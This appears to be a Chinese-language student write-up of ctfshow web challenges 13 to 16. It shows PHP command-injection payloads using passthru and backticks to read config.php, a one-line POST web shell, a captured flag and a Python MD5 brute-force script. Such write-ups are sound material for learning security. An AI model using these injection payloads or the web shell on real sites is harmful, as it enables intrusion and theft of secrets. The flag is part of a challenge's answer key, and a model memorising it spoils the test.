#web
web13
说实话这道题拿不下来了,他给我;屏蔽了,去差wp,发现居然还有新方法 ls|grep con*
但是要注意要把ls|grep con*解析所以要 `ls|grep con*`,然后因为;别屏蔽了,那就用?>
?c=passthru("more `ls|grep con*`")?>
web14
屏蔽太多了,传马
?c=echo `$_POST[a]`?>
看不到上传成功没,那就试试
用heckbar,因为懒不想打开bp先按Load,点击Post data,因为我们不是在url传的所以大概率就POST了,因为常用的就这两个,然后直接a=cat config.php,到手
web15
这里照应一下前文,`` 的作用
绕过的越来越多了,还是传一个马吧
这道题没有像之前一样把“;”屏蔽,那就把上次用的木马换一下
?c=echo `$_POST[a]`;
还是heckbar,然后查看源代码
ctfshow{f31456e6-e3ea-4dd7-bfcf-4d7b923054e8}
web16
一个md5解密但是我怎么去找都解不出来,只能用脚本了
import hashlib
str1='abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ'
for i in str1:
for j in str1:
for k in str1:
s = hashlib.md5(('ctfshow'+i+j+k).encode()).hexdigest()
#print(type(s))
if s=='a6f57ae38a22448c2f07f3f95f49c84e':
print(i+j+k)
发出请求?c=36d
到手
暂时不写了这个md5 的脚本我要研究一下